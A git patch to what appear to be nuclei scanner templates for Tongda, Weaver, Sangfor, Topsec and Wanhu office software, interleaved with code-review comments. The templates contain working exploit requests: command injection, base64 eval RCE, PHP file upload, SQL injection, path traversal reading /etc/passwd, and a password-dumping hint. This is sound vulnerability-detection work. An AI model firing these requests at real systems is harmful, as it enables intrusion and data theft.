From 9e8623a907b703d3b27bd8faa882f295ee4bb60b Mon Sep 17 00:00:00 2001 
From: Ritik Chaddha Date: Fri, 15 Sep 2023 00:41:38 +0530 Subject: [PATCH] templates update -2 --- .../sangfor/sangfor-login-rce.yaml | 5 +- ...eak.yaml => seeyon-initdata-exposure.yaml} | 0 ...ile.yaml => tongda-action-uploadfile.yaml} | 17 +++--- ...yaml => tongda-contact-list-exposure.yaml} | 15 ++--- .../tongda/tongda-getdata-rce.yaml | 22 ++++--- .../tongda/tongda-insert-sqli.yaml | 6 +- .../tongda/tongda-meeting-unauth.yaml | 29 +++------- .../topsec/topsec-topapplb-auth-bypass.yaml | 37 ++++++++++++ .../wanhu/wanhu-documentedit-sqli.yaml | 9 +-- .../ecology-jqueryfiletree-traversal.yaml | 34 +++++++++++ ...-e-bridge-linux-saveyzjfile-file-read.yaml | 45 --------------- ...-bridge-windows-saveyzjfile-file-read.yaml | 45 --------------- .../weaver/weaver-e-cology-getdata-sqli.yaml | 33 ----------- .../weaver-e-cology-getsqldata-sqli.yaml | 35 ------------ ...-e-cology-hrmcarreerapplyperview-sqli.yaml | 30 ---------- ...gy-jqueryfiletree-directory-traversal.yaml | 33 ----------- ...reeuploadaction-arbitrary-file-upload.yaml | 53 ----------------- .../weaver/weaver-ebridge-lfi.yaml | 50 ++++++++++++++++ ...aml => weaver-ecology-bshservlet-rce.yaml} | 26 +++++---- .../weaver-ecology-getsqldata-sqli.yaml | 39 +++++++++++++ .../weaver/weaver-ecology-hrmcareer-sqli.yaml | 35 ++++++++++++ .../weaver-ktreeuploadaction-file-upload.yaml | 57 +++++++++++++++++++ 22 files changed, 316 insertions(+), 339 deletions(-) rename http/vulnerabilities/seeyon/{seeyon-oa-initdataassess-infoleak.yaml => seeyon-initdata-exposure.yaml} (100%) rename http/vulnerabilities/tongda/{tongda-v2017-action-uploadfile.yaml => tongda-action-uploadfile.yaml} (85%) rename http/vulnerabilities/tongda/{tongda-contact-list-disclosure.yaml => tongda-contact-list-exposure.yaml} (68%) create mode 100755 http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml create mode 100755 http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml delete mode 100644 
http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml create mode 100644 http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml rename http/vulnerabilities/weaver/{weaver-e-cology-bshservlet-rce.yaml => weaver-ecology-bshservlet-rce.yaml} (58%) create mode 100755 http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml create mode 100755 http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml create mode 100755 http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml diff --git a/http/vulnerabilities/sangfor/sangfor-login-rce.yaml b/http/vulnerabilities/sangfor/sangfor-login-rce.yaml index 7cb79fe1b0..b182eaf6e1 100644 --- a/http/vulnerabilities/sangfor/sangfor-login-rce.yaml +++ b/http/vulnerabilities/sangfor/sangfor-login-rce.yaml @@ -10,9 +10,9 @@ info: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/sangfor-login-rce.yaml metadata: max-request: 1 - fofa-query: fid="iaytNA57019/kADk8Nev7g==" verified: true - tags: sangfor,ad,rce + fofa-query: fid="iaytNA57019/kADk8Nev7g==" + tags: sangfor,rce http: - raw: @@ -23,7 +23,6 @@ http: clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123 - matchers-condition: and matchers: - type: dsl dsl: diff --git a/http/vulnerabilities/seeyon/seeyon-oa-initdataassess-infoleak.yaml b/http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml similarity index 100% rename from http/vulnerabilities/seeyon/seeyon-oa-initdataassess-infoleak.yaml rename to http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml 
diff --git a/http/vulnerabilities/tongda/tongda-v2017-action-uploadfile.yaml b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml similarity index 85% rename from http/vulnerabilities/tongda/tongda-v2017-action-uploadfile.yaml rename to http/vulnerabilities/tongda/tongda-action-uploadfile.yaml index bf8a174e26..33ebd44c35 100755 --- a/http/vulnerabilities/tongda/tongda-v2017-action-uploadfile.yaml +++ b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml @@ -1,7 +1,7 @@ -id: tongda-v2017-action-uploadfile +id: tongda-action-uploadfile info: - name: Tongda OA v2017 action_upload.php - Arbitrary File Upload + name: Tongda OA v2017 action_upload - Arbitrary File Upload author: SleepingBag945 severity: critical description: | @@ -11,9 +11,12 @@ info: - https://github.com/shadow1ng/fscan/blob/main/WebScan/pocs/tongda-v2017-uploadfile.yml metadata: max-request: 1 - fofa-query: app="TDXK-通达OA" verified: true - tags: tongda,fileupload + fofa-query: app="TDXK-通达OA" + tags: tongda,fileupload,intrusive + +variables: + num: "999999999" http: - raw: @@ -21,8 +24,6 @@ http: POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjhddzlqp - X_requested_with: XMLHttpRequest - Accept-Encoding: gzip ------WebKitFormBoundaryjhddzlqp Content-Disposition: form-data; name="CONFIG[fileFieldName]" @@ -44,7 +45,7 @@ http: Content-Disposition: form-data; name="ffff"; filename="test.php" Content-Type: application/octet-stream - + ------WebKitFormBoundaryjhddzlqp Content-Disposition: form-data; name="mufile" @@ -59,7 +60,7 @@ http: matchers: - type: word words: - - "1f18933ca1e531c1eac9cccc4952a03b" + - '{{md5(num)}}' - type: status status: 
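Review bot: The word matcher now expects `{{md5(num)}}`, but the multipart body that has to produce that digest lies between the two hunks and is not shown, so the hunk cannot confirm that the uploaded `test.php` echoes the md5 of `num` rather than whatever input the old constant `1f18933ca1e531c1eac9cccc4952a03b` was derived from; please verify the payload references `{{num}}`, otherwise the matcher can never fire. Since the template writes `test.php` on the target (hence the new `intrusive` tag), a comment above `variables:` such as `# uploads test.php to the target; intrusive` makes that cost visible to operators. Dropping the `X_requested_with` and `Accept-Encoding` headers is fine.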
diff --git a/http/vulnerabilities/tongda/tongda-contact-list-disclosure.yaml b/http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml similarity index 68% rename from http/vulnerabilities/tongda/tongda-contact-list-disclosure.yaml rename to http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml index 732d8aca04..9f1ec30dfb 100755 --- a/http/vulnerabilities/tongda/tongda-contact-list-disclosure.yaml +++ b/http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml @@ -1,19 +1,19 @@ -id: tongda-contact-list-disclosure +id: tongda-contact-list-exposure info: - name: Tongda OA v2014 Get Contactlistt - Exposure + name: Tongda OA v2014 Get Contactlistt - Sensitive Information Disclosure author: SleepingBag945 severity: medium description: | There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks. reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2014%20get_contactlist.php%20敏感信息泄漏漏洞.html - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-contact-list-disclosure.yaml metadata: max-request: 1 - fofa-query: app="TDXK-通达OA verified: true + fofa-query: app="TDXK-通达OA" tags: tongda,oa,exposure + http: - method: GET path: @@ -23,9 +23,10 @@ http: matchers: - type: word words: - - "user_uid" - - "user_name" - - "priv_name" + - 'user_uid":' + - 'user_name":' + - 'priv_name":' + condition: and - type: status status: diff --git a/http/vulnerabilities/tongda/tongda-getdata-rce.yaml b/http/vulnerabilities/tongda/tongda-getdata-rce.yaml index 8241194a68..6695fba6a2 100755 --- a/http/vulnerabilities/tongda/tongda-getdata-rce.yaml +++ b/http/vulnerabilities/tongda/tongda-getdata-rce.yaml 
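Review bot: The rewritten `name:` line keeps the typo `Contactlistt`; the endpoint named in the description is `get_contactlist.php`, so `name: Tongda OA v2014 Get Contactlist - Sensitive Information Disclosure`. Tightening the words to the JSON key form (`user_uid":` etc.) with `condition: and` is a good false-positive reduction; the `matchers-condition` that joins the word matcher with the status matcher is outside this hunk, so I could not confirm it is `and`.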
@@ -1,7 +1,7 @@ id: tongda-getdata-rce info: - name: Tongda OA v11.9 getadata - Remoce Code Execution + name: Tongda OA v11.9 getadata - Remote Code Execution author: SleepingBag945 severity: critical description: | @@ -10,21 +10,27 @@ info: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20getdata%20%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md metadata: max-request: 1 - fofa-query: app="TDXK-通达OA" verified: true + fofa-query: app="TDXK-通达OA" tags: tongda,rce variables: - payload: "echo RCE;" + num: '999999999' + payload: "echo md5({{num}});" http: - method: GET path: - "{{BaseURL}}/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22{{base64(payload)}}%22)))%3B/*&id=19&module=Carouselimage" + matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains(body, "RCE") && contains(body, "pagelimit")' - - 'status_code == 200' - condition: and \ No newline at end of file + - type: word + words: + - '{{md5(num)}}' + - 'pagelimit' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml index e00ff40012..0cb10d5fbd 100755 --- a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml +++ b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml @@ -10,8 +10,8 @@ info: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: max-request: 1 - fofa-query: app="TDXK-通达OA" verified: true + fofa-query: app="TDXK-通达OA" tags: tongda,sqli http: 
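Review bot: The corrected `name:` still misspells the endpoint as `getadata` while the request path in the second hunk uses `getdata`; `name: Tongda OA v11.9 getdata - Remote Code Execution`. The new `num` variable is single-quoted (`'999999999'`) whereas the sibling templates in this commit (tongda-action-uploadfile, weaver-ecology-getsqldata-sqli, weaver-ecology-hrmcareer-sqli) use double quotes; pick one style. Adding `matchers-condition: and` for the word + status pair is correct.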
@@ -23,13 +23,15 @@ http: title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER= - matchers-condition: and matchers: - type: word part: header words: - "PHPSESSID=" + - "register_for/?rid=" + condition: and + - type: status status: - 302 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml b/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml index c36e8c5246..df831fe145 100755 --- a/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml +++ b/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml @@ -5,14 +5,13 @@ info: author: SleepingBag945 severity: medium description: | - Tongda Meeting Unauthorized Access wereDetected + Tongda Meeting Unauthorized Access were Detected. reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html - - https://github.com/chaitin/xray/blob/master/pocs/tongda-meeting-unauthorized-access.yml + - https://github.com/hktalent/scan4all/blob/2a7faf7862265eab33699034fd193bcf11b44e0f/config/poc/%E9%80%9A%E8%BE%BEoa/%E9%80%9A%E8%BE%BEoa-meeting-unauthorized-access.json#L10 metadata: max-request: 1 - fofa-query: app="TDXK-通达OA verified: true + fofa-query: app="TDXK-通达OA" tags: tongda,unauth,misconfig http: @@ -20,21 +19,9 @@ http: path: - "{{BaseURL}}/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay" - matchers-condition: and matchers: - - type: word - words: - - "creator" - - "originalTitle" - - "view" - - "type" - condition: and - - - type: word - part: header - words: - - "application/json" - - - type: status - status: - - 200 \ No newline at end of file + - type: dsl + dsl: + - status_code == 200 && contains(header, 'application/json') + - contains_all(body, 'creator\":', 'originalTitle\":', 'view\":', 'type\":') + condition: and \ No newline at end of file 
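Review bot: Removing `matchers-condition: and` while two matchers remain (the header word matcher and the `status: 302` matcher) changes the template's semantics: nuclei's default between matchers is OR, so any 302 response now satisfies the template regardless of the `PHPSESSID=` / `register_for/?rid=` header check, a false-positive source. Keep the line directly above `matchers:`: `matchers-condition: and`. tongda-getdata-rce in this same commit adds exactly that line for its word + status pair, so this looks like an oversight rather than intent.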
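Review bot: The reworded description `Tongda Meeting Unauthorized Access were Detected.` is still ungrammatical and does not say what is exposed; the request in this hunk targets `/general/calendar/arrange/get_cal_list.php`, so something like `The get_cal_list.php calendar endpoint of Tongda OA returns arrangement records without authentication.` would describe the check. The `contains_all(body, 'creator\":', ...)` entry relies on the DSL, not YAML, to turn `\"` into a quote inside a plain scalar; a comment above `dsl:` such as `# \" is unescaped by the DSL, not by YAML` would stop the next editor from "fixing" it.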
diff --git a/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml b/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml
new file mode 100755
index 0000000000..fae8bd88a8
--- /dev/null
+++ b/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml
@@ -0,0 +1,37 @@
+id: topsec-topapplb-auth-bypass
+
+info:
+ name: Topsec TopAppLB - Authentication Bypass
+ author: SleepingBag945
+ severity: high
+ description: |
+ Topsec TopAppLB is vulnerable to authetication bypass .Enter any account on the login page, the password is `;id`.
+ reference:
+ - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
+ metadata:
+ max-request: 1
+ verified: true
+ fofa-query: title="TopApp-LB 负载均衡系统"
+ tags: topsec,topapplb,auth-bypass
+
+http:
+ - raw:
+ - |
+ POST /login_check.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ userName=admin&password=%3Bid
+
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_1 == 302 && status_code_2 == 200'
+ - 'contains(body_2,"var IsHeadMin ")'
+ - 'contains(header_1,"redirect.php") && !contains(tolower(header_1), "error=1")'
+ condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml b/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml
index 8ce4356906..fd801b47a6 100755
--- a/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml
+++ b/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml
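Review bot: `max-request: 1` undercounts: the template sends two raw requests (the `POST /login_check.php` and the cookie-reused `GET /`), so it should read `max-request: 2`. The description has a typo and a spacing slip — `authetication bypass .Enter` should be `authentication bypass. Entering` — and it would help to state that the first check is the absence of `error=1` in the redirect, which is what the third DSL line tests. The three DSL lines under `condition: and` are otherwise a reasonable guard against matching a generic 302.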
@@ -15,17 +15,18 @@ info: fofa-query: app="万户网络-ezOFFICE" tags: wanhu,sqli + http: - raw: - | - GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:5'-- HTTP/1.1 + @timeout: 15s + GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:7'-- HTTP/1.1 Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded matchers: - type: dsl dsl: - - 'duration>=5' + - 'duration>=7' - 'status_code == 200' - - 'contains(body, "iSignature HTML V6")' + - 'contains_all(body, "iSignature", "DoYFSignature")' condition: and \ No newline at end of file diff --git a/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml b/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml new file mode 100755 index 0000000000..30505f4c62 --- /dev/null +++ b/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml 
@@ -0,0 +1,34 @@
+id: ecology-jqueryfiletree-traversal
+
+info:
+ name: Weaver E-Cology JqueryFileTree - Directory Traversal
+ author: SleepingBag945
+ severity: medium
+ description: |
+ Panwei OA E-Cology jqueryFileTree.jsp directory traversal vulnerability.
+ reference:
+ - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md?plain=1#L24
+ metadata:
+ max-request: 1
+ verified: true
+ shodan-query: ecology_JSessionid
+ fofa-query: app="泛微-协同办公OA"
+ tags: weaver,ecology,traversal,lfr
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "'index.jsp','"
+ - "重命名"
+ - "新建目录"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml b/http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml
deleted file mode 100644
index 7f29310417..0000000000
--- a/http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml
+++ /dev/null
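Review bot: The new template's `id:` and filename (`ecology-jqueryfiletree-traversal`) drop the `weaver-` prefix that every other file this commit touches under `http/vulnerabilities/weaver/` carries (`weaver-ebridge-lfi`, `weaver-ecology-*`, `weaver-ktreeuploadaction-file-upload`); `id: weaver-ecology-jqueryfiletree-traversal` with a matching filename keeps the directory consistent and greppable. The description names the vendor `Panwei` while `name:` says `Weaver` — the same transliteration mismatch appears in weaver-ecology-getsqldata-sqli and weaver-ecology-hrmcareer-sqli — so use `Weaver` throughout. Folding the three separate word matchers of the old file into one `condition: and` matcher under `matchers-condition: and` is the right structure.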
@@ -1,45 +0,0 @@ -id: weaver-e-bridge-linux-saveyzjfile-file-read - -info: - name: weaver-e-bridge-linux-saveyzjfile-file-read - author: SleepingBag945 - severity: high - description: 泛微OA E-Bridge saveYZJFile接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件 - reference: - - https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html - tags: eBridge,weaver,oa,read - -http: - - raw: - - | - GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - | - GET /file/fileNoLogin/{{idname}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - extractors: - - type: regex - name: idname - internal: true - group: 1 - regex: - - '"id":"(.*?)"' - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - status_code_1 == 200 && contains(body_1,'id') - - "status_code_2 == 200 && contains(body_2, 'root:x:0')" - condition: and - - diff --git a/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml b/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml index 505e9fa07e..e69de29bb2 100644 --- a/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml +++ b/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml 
@@ -1,45 +0,0 @@ -id: weaver-e-bridge-windows-saveyzjfile-file-read - -info: - name: weaver-e-bridge-windows-saveyzjfile-file-read - author: SleepingBag945 - severity: high - description: 泛微OA E-Bridge saveYZJFile接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件 - reference: - - https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html - tags: eBridge,weaver,oa,read - -http: - - raw: - - | - GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - | - GET /file/fileNoLogin/{{idname}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - extractors: - - type: regex - name: idname - internal: true - group: 1 - regex: - - '"id":"(.*?)"' - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - status_code_1 == 200 && contains(body_1,'id') - - "status_code_2 == 200 && contains(body_2, 'Program Files')" - condition: and - - diff --git a/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml index 1aa960e3cf..e69de29bb2 100755 --- a/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml 
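Review bot: This file is not actually removed: the header reads `index 505e9fa07e..e69de29bb2 100644` with no `deleted file mode` line, and the commit header's `delete mode` list does not include it, so it stays in the tree as an empty file; the same holds for weaver-e-cology-getdata-sqli.yaml in the next section (`index 1aa960e3cf..e69de29bb2 100755`). An empty template will at best be skipped with a parse warning by everyone who loads the directory, and unlike the other deleted weaver templates the getdata.jsp check has no rewritten replacement in this commit, so that coverage is silently lost. Either `git rm` both files, or port the getdata check to a `weaver-ecology-getdata-sqli.yaml` in the style of the other rewritten templates.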
@@ -1,33 +0,0 @@ -id: weaver-e-cology-getdata-sqli - -info: - name: weaver-e-cology-getdata-sqli - author: SleepingBag945 - severity: high - description: 泛微e-cology OA系统的在 getdata.jsp 中,传入参数 cmd 值等于 getSelectAllId 时, 将从请求中获取 sql 参数值执行,导致 sql 注入 - reference: - - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getdata.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html - tags: ecology,weaver,oa,sqli - -http: - - raw: - - | - GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20str(40198*43774)%20as%20id HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "1759627252" - - type: status - status: - - 200 - -# Enhanced by md on 2022/10/31 -# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml deleted file mode 100755 index edbe68f434..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml +++ /dev/null 
@@ -1,35 +0,0 @@ -id: weaver-e-cology-getsqldata-sqli - -info: - name: weaver-e-cology-getsqldata-sqli - author: SleepingBag945 - severity: high - description: 泛微e-cology OA系统的getSqlData接口在使用mssql数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 - reference: - - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getSqlData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html - tags: ecology,weaver,oa,sqli - -http: - - raw: - - | - GET /Api/portal/elementEcodeAddon/getSqlData?sql=sql=select%20@@version HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{"api_status":' - - '"status":true}' - condition: and - - - type: status - status: - - 200 - -# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml deleted file mode 100755 index 9eb6b931d0..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: weaver-e-cology-hrmcarreerapplyperview-sqli - -info: - name: weaver-e-cology-hrmcarreerapplyperview-sqli - author: SleepingBag945 - severity: high - description: 泛微OA E-Cology HrmCareerApplyPerView.jsp 文件存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库敏感文件 - reference: - - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20HrmCareerApplyPerView.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html - tags: ecology,weaver,oa,sqli - -http: - - raw: - - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7 HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml;charset=UTF-8 - - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "900150983cd24fb0d6963f7d28e17f72" - - type: status - status: - - 200 - -# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml b/http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml deleted file mode 100755 index c5f8c22310..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml +++ /dev/null 
@@ -1,33 +0,0 @@ -id: weaver-e-cology-jqueryfiletree-directory-traversal - -info: - name: weaver e-cology-jqueryfiletree-directory-traversal - author: SleepingBag945 - severity: medium - description: 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞 - reference: - - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html - tags: weaver,e-cology,oa - -http: - - raw: - - | - GET /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - matchers-condition: and - matchers: - - type: word - words: - - "'index.jsp','" - - type: word - words: - - "重命名" - - type: word - words: - - "新建目录" - - type: status - status: - - 200 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml b/http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml deleted file mode 100755 index 194fc8e07f..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml +++ /dev/null 
